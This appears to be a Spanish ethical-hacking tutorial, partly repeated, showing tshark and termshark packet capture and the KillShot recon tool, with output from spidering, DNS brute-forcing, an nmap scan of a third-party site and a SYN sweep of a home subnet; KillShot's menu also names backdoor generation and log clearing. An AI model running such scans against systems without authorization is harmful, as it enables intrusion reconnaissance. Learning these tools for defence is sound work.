  • Escriba cd termshark_1.0.0_linux_x64
  • Escriba ./termshark: esta precompilación ofrece una interfaz GUI basada en línea de comandos
  • Primero analizaremos termshark con la línea de comandos y luego mostraremos la interfaz gráfica de usuario basada en la línea de comandos
Uso
  • Escriba tshark -h
  • -h muestra el menú de ayuda
root@kali:~/Downloads# tshark -h
 Running as user "root" and group "root". This could be dangerous.
 tshark: option requires an argument -- 'f'
 Usage: tshark [options] …
 Capture interface:
   -i            name or idx of interface (def: first non-loopback)
   -f       packet filter in libpcap filter syntax
   -s              packet snapshot length (def: appropriate maximum)
   -p                       don't capture in promiscuous mode
   -I                       capture in monitor mode, if available
   -B          size of kernel buffer (def: 2MB)
   -y 
           link layer type (def: first appropriate)
   --time-stamp-type  timestamp method for interface
   -D                       print list of interfaces and exit
   -L                       print list of link-layer types of iface and exit
   --list-time-stamp-types  print list of timestamp types for iface and exit
  • Escriba tshark -i wlan0
  • -i se utiliza para asignar interfaz de red
  • Para comprobar la interfaz de red, escriba iwconfig
root@kali:~/go# iwconfig
 wlan0     IEEE 802.11  ESSID:"H###W##"
           Mode:Managed  Frequency:2.457 GHz  Access Point: ##:##:##:8D:##:E4
           Bit Rate=65 Mb/s   Tx-Power=20 dBm
           Retry short limit:7   RTS thr=2347 B   Fragment thr:off
           Encryption key:off
           Power Management:on
           Link Quality=67/70  Signal level=-43 dBm
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:74   Missed beacon:0
  • Escriba tshark -i wlan0
  • -i se utiliza para asignar interfaz de red
  • Esta consulta comenzará a capturar paquetes locales
root@kali:~/Downloads# tshark -i wlan0
 Running as user "root" and group "root". This could be dangerous.
 Capturing on 'wlan0'
     1 0.000000000  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=1 Win=253 Len=0
     2 0.589627876 192.168.1.10 → 192.168.1.3  SSH 214 Server: Encrypted packet (len=160)
     3 0.799904360  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=161 Win=252 Len=0
     4 1.103457921 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
     5 1.302880225  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=417 Win=251 Len=0
     6 1.615306911 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
     7 1.815734300  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=673 Win=256 Len=0
     8 2.127450002 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
     9 2.335133706  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=929 Win=255 Len=0
    10 2.639471642 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
    11 2.850235384  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=1185 Win=254 Len=0
    12 3.151440488 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
    13 3.360222085  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=1441 Win=253 Len=0
    14 3.539527427  192.168.1.3 → 239.255.255.250 SSDP 216 M-SEARCH * HTTP/1.1
  • La consulta anterior ha capturado paquetes TCP con secuencia y confirmación. El número de secuencia se utiliza para dividir los datos grandes en uno más pequeño. Mencionando cada dirección IP con cada protocolo de red
  • El campo Número de acuse de recibo contiene el siguiente número de secuencia que el remitente del acuse de recibo espera recibir
  • El análisis completo del número de secuencia y el número de confirmación es una parte interesante de los cursos de piratería ética ofrecidos por el Instituto Internacional de Seguridad Cibernética en Delhi, India
Capturar el paquete deseado de datos
  • Escriba tshark -i wlan0 UDP
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red
  • tshark capturará solo paquetes UDP
root@kali:~# tshark -i wlan0 udp
 0Running as user "root" and group "root". This could be dangerous.
 Capturing on 'wlan0'
     1 0.000000000 192.168.1.10 → 192.168.1.255 BROWSER 243 Host Announcement DESKTOP-382RT0N, Workstation, Server, NT Workstation
     2 10.047894475  192.168.1.6 → 192.168.1.1  DNS 71 Standard query 0x575b A youtube.com
     3 10.047935767  192.168.1.6 → 192.168.1.1  DNS 71 Standard query 0x1367 AAAA youtube.com
     4 10.068684885  192.168.1.1 → 192.168.1.6  DNS 314 Standard query response 0x575b A youtube.com A 216.58.200.174 NS ns3.google.com NS ns4.google.com NS ns2.google.com NS ns1.google.com A 216.239.32.10 A 216.239.34.10 A 216.239.36.10 A 216.239.38.10 AAAA 2001:4860:4802:32::a AAAA 2001:4860:4802:36::a AAAA 2001:4860:4802:38::a
     5 10.136276096  192.168.1.1 → 192.168.1.6  DNS 326 Standard query response 0x1367 AAAA youtube.com AAAA 2404:6800:4002:811::200e NS ns1.google.com NS ns2.google.com NS ns4.google.com NS ns3.google.com A 216.239.32.10 A 216.239.34.10 A 216.239.36.10 A 216.239.38.10 AAAA 2001:4860:4802:32::a AAAA 2001:4860:4802:36::a AAAA 2001:4860:4802:38::a
     6 10.352876669  192.168.1.6 → 192.168.1.1  DNS 73 Standard query 0x05c2 A ocsp.pki.goog
     7 10.358805848  192.168.1.1 → 192.168.1.6  DNS 344 Standard query response 0x05c2 A ocsp.pki.goog CNAME pki-goog.l.google.com A 172.217.166.3 NS ns1.google.com NS ns2.google.com NS ns4.google.com NS ns3.google.com A 216.239.32.10 A 216.239.34.10 A 216.239.36.10 A 216.239.38.10 AAAA 2001:4860:4802:32::a AAAA 2001:4860:4802:36::a AAAA 2001:4860:4802:38::a
     8 10.556555958  192.168.1.6 → 192.168.1.1  DNS 75 Standard query 0x4d56 A www.youtube.com
     9 10.556594357  192.168.1.6 → 192.168.1.1  DNS 75 Standard query 0xe65e AAAA www.youtube.com
  • UDP (User Datagram Protocol) se usa para enviar mensajes cortos. El tráfico de la red UDP se organiza en forma de datagramas. Su protocolo no confiable y sin conexión
  • La consulta anterior ha recopilado registros diferidos después de asignar el protocolo UDP. En primer lugar, muestra la solicitud se envía al navegador. Luego muestra la solicitud de DNS (Sistema de nombres de dominio) para la URL (youtube.com) con la dirección IP de 216.58.200.174. También puede comprobar lo mismo con nslookup
  • Uso del Servidor de nombres (NS) ns1.google.com con una consulta de DNS estándar
Interfaz GUI basada en la línea de comandos de Termshark
  • Escriba cd termshark_1.0.0_linux_x64
  • Escriba ./termshark -i wlan0
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red
  • Presione el botón ? en el teclado de su computadora
  • La consulta anterior muestra los paquetes capturados y el menú de ayuda
Filtrado de paquetes con GUI basada en línea de comandos
  • Escriba ./termshark -i wlan0
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red.
  • Después de que termshark comenzará a capturar el paquete. En el cuadro de diálogo Filtro, puede ingresar cualquier protocolo. Aquí hemos escrito UDP. Después de escribir UDP, haga clic en Aplicar para capturar solo paquetes UDP
  • La salida anterior muestra la transmisión de paquetes, mostrando la dirección IP de origen y destino con la longitud del paquete. A continuación verás cómo funciona UDP
  • Cada paquete muestra con el tiempo necesario para la transmisión
  • La apertura de los primeros cuadros de paquetes muestra que el paquete es de 216 bytes. Luego muestra el tiempo de llegada y el cambio de tiempo del paquete
  • El análisis adicional muestra la versión de solicitud y el agente de usuario utilizado en la transferencia de paquetes de datos
Sólo ver transmisión de paquetes
  • Escriba ./termshark -i wlan
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red
  • Presione el botón / en el teclado para ver solo la transmisión de paquetes
  • La salida anterior muestra la transmisión de paquetes en la red interna. Puede ver paquetes de transacciones entre dos direcciones IPv4
  • Luego muestra el tamaño de paquete de Ethernet encriptado len = 64. Con Seq = 1 y cambiando el reconocimiento
Abrir archivos PCAP
  • Ahora, muchas veces recibe el archivo pcap durante sus proyectos con el Instituto Internacional de Seguridad Cibernética para analizar el flujo de paquetes y realizar actividades forenses cibernéticas en el archivo pcap
  • Puede abrir cualquier archivo guardado desde cualquier otro analizador de red. Aquí hemos abierto otro archivo pcap que se guardó después de capturar la red interna con wireshark
  • Para abrir archivos pcap., escriba ./termshark -r wlan0-299382837.pcap
  • -r se usa para mencionar el archivo pcap. 299382837 es un archivo pcap
  • La captura de pantalla de arriba muestra la transmisión de paquetes de los protocolos de red UDP e ICMP. Además, muestra la transmisión de paquetes utilizando HTTP 1.1 con el tiempo que tomó transferir paquetes desde la dirección IP de origen a destino

Realice auditorías de seguridad en cualquier sitio web con Killshot

La herramienta KillShot puede rastrear una aplicación web objetivo y encontrar su tecnología web back-end, identificar sistemas de administración de contenido (CMS) utilizado, así como escanear puertos abiertos con servicios en ejecución. Con la ayuda de otras herramientas de hacking, como Whatweb, Dig, Fierce o Identifies CMS, Killshot puede escanear y recolectar información sobre cualquier sitio web. El uso de Killshot, así como del resto de herramientas antes mencionadas, forma parte de los temas del curso de hacking ético del Instituto Internacional de Seguridad Cibernética (IICS).




Instalación
  • Esta herramienta fue probada en Kali Linux 2018.2
  • Abra el terminal y escriba git clone https://github.com/bahaabdelwahed/killshot
  • Cuando se descargue, escriba cd killshot
  • Luego escriba ruby setup.rb (si la configuración muestra algún error, intente instalar las herramienta manualmente)
  • La solicitud de algunos permisos tomará un tiempo, presione siempre SÍ y continúe con la instalación. Para ejecutar la herramienta, escriba ruby killshot.rb
  • Luego escriba help
Uso
  • Estamos utilizando www.hackthissite.org como sitio web objetivo
  • Después de la opción help, elija el sitio e ingrese
root@kali:~/killshot# ruby Killshot.rb
 ██╗  ██╗██╗██╗     ██╗         ███████╗██╗  ██╗ ██████╗ ████████╗
 ██║ ██╔╝██║██║     ██║         ██╔════╝██║  ██║██╔═══██╗╚══██╔══╝
 █████╔╝ ██║██║     ██║         ███████╗███████║██║   ██║   ██║
 ██╔═██╗ ██║██║     ██║         ╚════██║██╔══██║██║   ██║   ██║
 ██║  ██╗██║███████╗███████╗    ███████║██║  ██║╚██████╔╝   ██║
 ╚═╝  ╚═╝╚═╝╚══════╝╚══════╝    ╚══════╝╚═╝  ╚═╝ ╚═════╝    ╚═╝
                                <Track my Target>       Gather information                                                            About Targets
 track>>> : help
 [site] MAKE YOUR TARGET
 [help] show this MESSAGE
 [targ] Search targets
 [exit] exit the script
 [uptd] Update KillShot
 [anon] Run Anonymous Mode
 [info] About killShot
 track>>> :
  • Luego ingrese el sitio web que desea escanear. Estamos usando www.hackthissite.org
  • Escriba www.hackthissite.org y pulse enter

       .n                   .                 .                  n.
  .   .dP                  dP                   9b                 9b.    .
 4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP
 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
  `9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
    `9XXXXXXXXXXXP' `9XX'   Hide    `98v8P'  Hack   `XXP' `9XXXXXXXXXXXP'
        ~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
                        )b.  .dbo.dP'`v'`9b.odb.  .dX
{0} Spider
 {1} Web technologie
 {2} WebApp Vul Scanner
 {3} Port Scanner
 {4} CMS Scanner
 {5} Fuzzers
 {6} Cms Exploit Scanner
 {7} Backdoor Generation
 {8} Linux Log Clear
 {9} Find MX/NS
 info>>> :
  • Ahora mostrará múltiples opciones, puedes usar cualquiera de ellas
  • Aquí estamos utilizando 0 spider
info>>> : 0
  ip For www.hackthissite.org :: "137.74.187.104"
 Links And Paths  ::
 Related domains and Parameters ::
 https://www.hackthissite.org
 irc://irc.hackthissite.org:+7000/
 https://www.hackthissite.org/forums
 https://www.cafepress.com/htsstore
 https://hts.io
 https://twitter.com/hackthissite
 /
 https://www.hackthissite.org/TNG355Q5B85cL3PDeI88H0dLCRYaA776flCTc4MX0u136lQ4hP94cZSnOFheqEU9zT8k6WDlcG17HglFDUi0Tg7kH42bzckCR4Q2ZQ
 https://www.hackthissite.org/advertise/
 /user/login
 /register
 /user/resetpass
 https://www.hackthissite.org/donate/
 /missions/basic/
 /missions/realistic/
 /missions/application/
 /missions/programming/
 /missions/phonephreaking/
 /missions/javascript/
 /missions/forensic/
 /missions/playit/extbasic/0/
 /missions/playit/stego/0/
 irc://irc.hackthissite.org/htb
 /blogs
 /news
 /pages/articles/article.php
 /lectures
 /pages/programs/programs.php
 http://mirror.hackthissite.org/hackthiszine/
  • Esta salida mostrará las páginas rastreadas del dominio objetivo. También mostró el inicio de sesión del usuario y el registro de las páginas del objetivo
  • Y luego estamos usando la opción (1) web technologie, esta opción escaneará el sitio web utilizando WhatWeb Information, Dig y también intentará la transferencia de zona y la fuerza bruta, el resultado de la ruta de rastreo y la detección de cortafuegos e IDS
info>>> : 1
  [+]Basic WhatWeb Information  ::
  terminated with exception (report_on_exception is true):
 Traceback (most recent call last):
         2542: from /usr/bin/whatweb:981:in block (2 levels) in <main>'         2541: from /usr/bin/whatweb:981:inloop'
         2540: from /usr/bin/whatweb:988:in block (3 levels) in <main>'         2539: from /usr/share/whatweb/lib/target.rb:96:inopen'
         2538: from /usr/share/whatweb/lib/target.rb:188:in open_url'         2537: from /usr/lib/ruby/2.5.0/net/http.rb:1455:inrequest'
         2536: from /usr/lib/ruby/2.5.0/net/http.rb:909:in start'         2535: from /usr/lib/ruby/2.5.0/net/http.rb:920:indo_start'
          … 2530 levels…
            4: from /usr/lib/ruby/2.5.0/resolv.rb:524:in block in fetch_resource'            3: from /usr/lib/ruby/2.5.0/resolv.rb:769:insender'
            2: from /usr/lib/ruby/2.5.0/resolv.rb:629:in allocate_request_id'            1: from /usr/lib/ruby/2.5.0/resolv.rb:629:insynchronize'
 /usr/lib/ruby/2.5.0/resolv.rb:630:in block in allocate_request_id': stack level too deep (SystemStackError) Traceback (most recent call last):         2542: from /usr/bin/whatweb:981:inblock (2 levels) in 
'
.-------------------------SNIP---------------------------------------------
         2541: from /usr/bin/whatweb:981:in loop'         2540: from /usr/bin/whatweb:988:inblock (3 levels) in '
         2539: from /usr/share/whatweb/lib/target.rb:96:in open'         2538: from /usr/share/whatweb/lib/target.rb:188:inopen_url'
         2537: from /usr/lib/ruby/2.5.0/net/http.rb:1455:in request'         2536: from /usr/lib/ruby/2.5.0/net/http.rb:909:instart'
         2535: from /usr/lib/ruby/2.5.0/net/http.rb:920:in do_start'          ... 2530 levels...            4: from /usr/lib/ruby/2.5.0/resolv.rb:524:inblock in fetch_resource'
            3: from /usr/lib/ruby/2.5.0/resolv.rb:769:in sender'            2: from /usr/lib/ruby/2.5.0/resolv.rb:629:inallocate_request_id'
            1: from /usr/lib/ruby/2.5.0/resolv.rb:629:in synchronize' /usr/lib/ruby/2.5.0/resolv.rb:630:inblock in allocate_request_id': stack level too deep (SystemStackError)
  [+]Host Result ::
 www.hackthissite.org has address 137.74.187.100
 www.hackthissite.org has address 137.74.187.103
 www.hackthissite.org has address 137.74.187.104
 www.hackthissite.org has address 137.74.187.102
 www.hackthissite.org has address 137.74.187.101
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:102
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:103
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:101
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:104
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:100
  [+]Dig Result About Dns::
 ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7021 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1 ;8.8.8.8.                       IN      A ;; AUTHORITY SECTION: .                       6767    IN      SOA     a.root-servers.net. nstld.verisign-grs.com. 2019050800 1800 900 604800 86400 ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5506
 ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 0
 ;www.hackthissite.org.          IN      A
 ;; ANSWER SECTION:
 www.hackthissite.org.   2440    IN      A       137.74.187.100
 www.hackthissite.org.   2440    IN      A       137.74.187.103
 www.hackthissite.org.   2440    IN      A       137.74.187.104
 www.hackthissite.org.   2440    IN      A       137.74.187.102
 www.hackthissite.org.   2440    IN      A       137.74.187.101
  [+]Trying zone transfer and Brute force ::
 Option w is ambiguous (wide, wordlist)
 Trying zone transfer first…
 Unsuccessful in zone transfer (it was worth a shot)
 Okay, trying the good old fashioned way… brute force
 Checking for wildcard DNS…
 Nope. Good.
 Now performing 2280 test(s)…
 Subnets found (may want to probe here using nmap or unicornscan):
 Done with Fierce scan: http://ha.ckers.org/fierce/
 Found 0 entries.
 Have a nice day.
  • Esta salida mostrará la información básica de un sitio web. Su escaneo detectó aplicaciones, servidores web y otras tecnologías. También escanea los encabezados HTTP del servidor web y el origen HTML de un destino.
  • Resultado del host: muestra la dirección IP del host del sitio web y también analiza IPv4 o IPv6 de un sitio web.
  • También escanea el Firewall y el IDS en el destino (No se detectó WAF por la detección genérica) significa NO WAF (Firewall de aplicación web).La herramienta Dig se usa para consultar servidores de nombres DNS, para obtener información como direcciones de host, servidor de correo, servidores de nombres e información relacionada. También se encuentran los registros A del objetivo
NOTA: PARA OBTENER TODAS LAS OPCIONES NO NECESITA DESPLAZARSE, SÓLO ESCRIBA BANNER Y SE MOSTRARÁN TODAS LAS OPCIONES
  • Y ahora usaremos la opción {3} Port Scanner, este escaneará puertos de destino completos utilizando dos herramientas: nmap y unicorn scan
Escaneo con Nmap
  • Elija cualquiera de ellos
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>0
  • Escriba 0
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>0
 [2] Nmap Os Scan
 [3] Nmap TCP Scan
 [4] Nmap UDB Scan
 [5] Nmap All scan
 [6] Nmap Http Option Scan
 [7] Nmap Live target In Network
 Scanner >>
  • Mostrará todas las opciones de Nmap
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>0
 [2] Nmap Os Scan
 [3] Nmap TCP Scan
 [4] Nmap UDB Scan
 [5] Nmap All scan
 [6] Nmap Http Option Scan
 [7] Nmap Live target In Network
 Scanner >>5
 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-09 05:59 EDT
 Nmap scan report for www.acunetix.com (54.208.84.166)
 Host is up (0.24s latency).
 rDNS record for 54.208.84.166: ec2-54-208-84-166.compute-1.amazonaws.com
 Not shown: 998 filtered ports
 PORT    STATE SERVICE  VERSION
 80/tcp  open  http     nginx
 |http-server-header: acunetix.com |_http-title: Did not follow redirect to https://acunetix.com/ 443/tcp open  ssl/http nginx | http-robots.txt: 3 disallowed entries |/dontVisitMe/ /blog/worldsecuritynews/* /
 |_http-server-header: acunetix.com
 |_http-title: 400 The plain HTTP request was sent to HTTPS port
 | ssl-cert: Subject: commonName=.acunetix.com/organizationName=Acunetix Ltd/stateOrProvinceName=ST. JULIANS/countryName=MT | Subject Alternative Name: DNS:.acunetix.com, DNS:acunetix.com
 | Not valid before: 2018-10-24T00:00:00
 |_Not valid after:  2020-11-18T12:00:00
 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 Device type: media device|specialized|general purpose
 Running: Crestron embedded, Wago Kontakttechnik embedded, Linux 2.4.X
 OS CPE: cpe:/h:crestron:mpc-m5 cpe:/h:wago_kontakttechnik:750-852 cpe:/o:linux:linux_kernel:2.4.26
 OS details: Crestron MPC-M5 AV controller or Wago Kontakttechnik 750-852 PLC, Linux 2.4.26 (Slackware 10.0.0)
 TRACEROUTE (using port 80/tcp)
 HOP RTT     ADDRESS
 1   …
 2   4.06 ms 115.97.136.1
 3   … 30
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 58.15 seconds
  • Nmap TCP Scan muestra los puertos abiertos y cerrados de TCP. Este es uno de los temas más relevantes del curso de hacking ético del IICS
Escaneo de Unicorn
  • Ahora analizaremos la herramienta Unicorn. Debe seguir todos los pasos para obtener la opción de escaneo de puertos y luego seleccionar 1
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>1
 [8] Services OS
 [9] TCP SYN Scan on a whole network
 [01] UDP scan on the whole network
 Scanner >>
  • Se mostrarán los tipos de escaneados disponibles
  • Deje que seleccione [9] TCP SYN Scan en una red completa y le pedirá una dirección IP 192.168.1.1 del enrutador
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>1
 [8] Services OS
 [9] TCP SYN Scan on a whole network
 [01] UDP scan on the whole network
 Scanner >>9
 Your Router Ip : 192.168.1.1
  • Deje que el escaneo continúe
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>1
 [8] Services OS
 [9] TCP SYN Scan on a whole network
 [01] UDP scan on the whole network
 Scanner >>9
 Your Router Ip : 192.168.1.1
 adding 192.168.1.0/24 mode TCPscan' ports7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
 using interface(s) eth0
----------------------------------SNIP-------------------------------------
 scaning 2.56e+02 total hosts with 8.65e+04 total packets, should take a little longer than 4 Minutes, 55 Seconds
 connected 192.168.1.12:34682 -> 192.168.1.10:139
 TCP open 192.168.1.10:139  ttl 128
 connected 192.168.1.12:19928 -> 192.168.1.5:139
 TCP open 192.168.1.5:139  ttl 128
 connected 192.168.1.12:57128 -> 192.168.1.3:139
 TCP open 192.168.1.3:139  ttl 128
 connected 192.168.1.12:40890 -> 192.168.1.4:139
 TCP open 192.168.1.4:139  ttl 128
 connected 192.168.1.12:63984 -> 192.168.1.3:3389
 TCP open 192.168.1.3:3389  ttl 128
 connected 192.168.1.12:4474 -> 192.168.1.1:23
 TCP open 192.168.1.1:23  ttl 64
 connected 192.168.1.12:19804 -> 192.168.1.5:445
 TCP open 192.168.1.5:445  ttl 128
 connected 192.168.1.12:17218 -> 192.168.1.10:445
 TCP open 192.168.1.10:445  ttl 128
 connected 192.168.1.12:16075 -> 192.168.1.4:445
 TCP open 192.168.1.4:445  ttl 128
 connected 192.168.1.12:35635 -> 192.168.1.3:445
 TCP open 192.168.1.3:445  ttl 128
 connected 192.168.1.12:59512 -> 192.168.1.1:53
 TCP open 192.168.1.1:53  ttl 64
 connected 192.168.1.12:17273 -> 192.168.1.1:80
 TCP open 192.168.1.1:80  ttl 64
 connected 192.168.1.12:17994 -> 192.168.1.3:554
 TCP open 192.168.1.3:554  ttl 128
 connected 192.168.1.12:10098 -> 192.168.1.4:554
 TCP open 192.168.1.4:554  ttl 128
 connected 192.168.1.12:5254 -> 192.168.1.10:135
 TCP open 192.168.1.10:135  ttl 128
 connected 192.168.1.12:10011 -> 192.168.1.3:135
 TCP open 192.168.1.3:135  ttl 128
 connected 192.168.1.12:19956 -> 192.168.1.4:135
 TCP open 192.168.1.4:135  ttl 128
 connected 192.168.1.12:21180 -> 192.168.1.5:135
 TCP open 192.168.1.5:135  ttl 128
 connected 192.168.1.12:14926 -> 192.168.1.1:443
 TCP open 192.168.1.1:443  ttl 64
 connected 192.168.1.12:17101 -> 192.168.1.10:443
 TCP open 192.168.1.10:443  ttl 128
 connected 192.168.1.12:6074 -> 192.168.1.3:443
 TCP open 192.168.1.3:443  ttl 128
 connected 192.168.1.12:51922 -> 192.168.1.4:443
 TCP open 192.168.1.4:443  ttl 128
 connected 192.168.1.12:13164 -> 192.168.1.6:22
 TCP open 192.168.1.6:22  ttl 64
 sender statistics 177.8 pps with 86528 packets sent total
 listener statistics 2894 packets recieved 0 packets droped and 0 interface drops
 TCP open                  telnet[   23]         from 192.168.1.1  ttl 64
 TCP open                  domain[   53]         from 192.168.1.1  ttl 64
 TCP open                    http[   80]         from 192.168.1.1  ttl 64
 TCP open                   https[  443]         from 192.168.1.1  ttl 64
 TCP open                   epmap[  135]         from 192.168.1.3  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.3  ttl 128
 TCP open                   https[  443]         from 192.168.1.3  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.3  ttl 128
 TCP open                    rtsp[  554]         from 192.168.1.3  ttl 128
 TCP open           ms-wbt-server[ 3389]         from 192.168.1.3  ttl 128
 TCP open                   epmap[  135]         from 192.168.1.4  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.4  ttl 128
 TCP open                   https[  443]         from 192.168.1.4  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.4  ttl 128
 TCP open                    rtsp[  554]         from 192.168.1.4  ttl 128
 TCP open                   epmap[  135]         from 192.168.1.5  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.5  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.5  ttl 128
 TCP open                     ssh[   22]         from 192.168.1.6  ttl 64
 TCP open                   epmap[  135]         from 192.168.1.10  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.10  ttl 128
 TCP open                   https[  443]         from 192.168.1.10  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.10  ttl 128
  • Se escanearán todos los puertos TCP abiertos en el objetivo
connected 192.168.1.12:34682 -> 192.168.1.10:139
 TCP open 192.168.1.10:139  ttl 128
  • También escanean los puertos TCP abiertos y muestra los servicios con puertos
  • Estadísticas del remitente 177.8 pps con 86528 paquetes enviados en total
  • Para escanear utiliza su tarjeta de red local como se muestra a continuación
using interface(s) eth0

Realice auditorías de seguridad en cualquier sitio web con Killshot

Realice auditorías de seguridad en cualquier sitio web con Killshot

La herramienta KillShot puede rastrear una aplicación web objetivo y encontrar su tecnología web back-end, identificar sistemas de administración de contenido (CMS) utilizado, así como escanear puertos abiertos con servicios en ejecución. Con la ayuda de otras herramientas de hacking, como Whatweb, Dig, Fierce o Identifies CMS, Killshot puede escanear y recolectar información sobre cualquier sitio web. El uso de Killshot, así como del resto de herramientas antes mencionadas, forma parte de los temas del curso de hacking ético del Instituto Internacional de Seguridad Cibernética (IICS).




Instalación
  • Esta herramienta fue probada en Kali Linux 2018.2
  • Abra el terminal y escriba git clone https://github.com/bahaabdelwahed/killshot
  • Cuando se descargue, escriba cd killshot
  • Luego escriba ruby setup.rb (si la configuración muestra algún error, intente instalar las herramienta manualmente)
  • La solicitud de algunos permisos tomará un tiempo, presione siempre SÍ y continúe con la instalación. Para ejecutar la herramienta, escriba ruby killshot.rb
  • Luego escriba help
Uso
  • Estamos utilizando www.hackthissite.org como sitio web objetivo
  • Después de la opción help, elija el sitio e ingrese
root@kali:~/killshot# ruby Killshot.rb
 ██╗  ██╗██╗██╗     ██╗         ███████╗██╗  ██╗ ██████╗ ████████╗
